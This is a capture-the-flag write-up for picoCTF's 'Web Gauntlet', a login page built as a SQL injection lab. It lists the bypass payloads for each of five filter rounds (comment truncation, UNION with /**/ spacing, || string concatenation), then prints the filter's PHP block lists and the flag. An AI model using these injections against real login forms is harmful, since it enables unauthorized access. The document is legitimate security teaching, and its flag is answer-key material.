Web Gauntlet
Point: 200
Category
Web Exploitation
Question
Can you beat the filters? Log in as admin http://jupiter.challenges.picoctf.org:44979/ http://jupiter.challenges.picoctf.org:44979/filter.php
Hint
Hint 1: You are not allowed to login with valid credentials.
Hint 2: Write down the injections you use in case you lose your progress.
Hint 3: For some filters it may be hard to see the characters, always (always) look at the raw hex in the response.
Hint 4: sqlite
Hint 5: If your cookie keeps getting reset, try using a private browser window
Solution
Looking at the login form that the challenge was given, I knew that this is a SQL Injection vulns.
Round 1/5
I've tried admin for both username and password but It didn't work. The server shown Invalid username/password and SELECT * FROM users WHERE username='admin' AND password='admin'.
In filter page I had Round1: or. Looking at the SQL command above, I'm gonna try to escape out of the single quote ', It means I want to ignore all this stuff ' AND password='admin'.Thus, I had the bypass like this username='admin';--'. The ; means that the end of the statement and the -- basically comments it out.
Then I've used admin';-- to get to round 2
Round 2/5
In this round I had a filter like this Round2: or and like = --. I could see the -- in this filter so I decided to not give a -- in the payload, then I've tried this admin'; and It's worked.
Round 3/5
This is filter for this round Round3: or and = like > < --. It's added a litle bit more but didn't change anything, so I've tried the same payload for the round 2 and It's worked.
Round 4/5
This is filter for this round Round4: or and = like > < -- admin. It's added admin in the filter so I could not use admin to bypass. I've tried some but It did not work. I decided to level up my bypass using UNION statement. I had a payload like this SELECT * FROM users WHERE username='admin'/**/UNION/**/SELECT/**/*FROM/**/users/**/LIMIT/**/1;, From here, I've used /**/ to simulate the whitespace within this input and It's worked.
Round 5/5
This is filter for this round Round5: or and = like > < -- union admin. It's added union to the filter so I couldn'n use union in the input. So I've tried to search for union attack in the Google and I led me to this link. Basically, I could use || to concatetane strings together. So, I've tried this adm'||'in'; for the input and finally, I could get the flag.
After all, I had all of the source code of the filter file and the flag.
<?php
session_start();
if (!isset($_SESSION["round"])) {
$_SESSION["round"] = 1;
}
$round = $_SESSION["round"];
$filter = array("");
$view = ($_SERVER["PHP_SELF"] == "/filter.php");
if ($round === 1) {
$filter = array("or");
if ($view) {
echo "Round1: ".implode(" ", $filter)."<br/>";
}
} else if ($round === 2) {
$filter = array("or", "and", "like", "=", "--");
if ($view) {
echo "Round2: ".implode(" ", $filter)."<br/>";
}
} else if ($round === 3) {
$filter = array(" ", "or", "and", "=", "like", ">", "<", "--");
// $filter = array("or", "and", "=", "like", "union", "select", "insert", "delete", "if", "else", "true", "false", "admin");
if ($view) {
echo "Round3: ".implode(" ", $filter)."<br/>";
}
} else if ($round === 4) {
$filter = array(" ", "or", "and", "=", "like", ">", "<", "--", "admin");
// $filter = array(" ", "/**/", "--", "or", "and", "=", "like", "union", "select", "insert", "delete", "if", "else", "true", "false", "admin");
if ($view) {
echo "Round4: ".implode(" ", $filter)."<br/>";
}
} else if ($round === 5) {
$filter = array(" ", "or", "and", "=", "like", ">", "<", "--", "union", "admin");
// $filter = array("0", "unhex", "char", "/*", "*/", "--", "or", "and", "=", "like", "union", "select", "insert", "delete", "if", "else", "true", "false", "admin");
if ($view) {
echo "Round5: ".implode(" ", $filter)."<br/>";
}
} else if ($round >= 6) {
if ($view) {
highlight_file("filter.php");
}
} else {
$_SESSION["round"] = 1;
}
// picoCTF{y0u_m4d3_1t_16f769e719ab9d3e310fd13dc1262ee1}
?>Flag
picoCTF{y0u_m4d3_1t_16f769e719ab9d3e310fd13dc1262ee1}
Last updated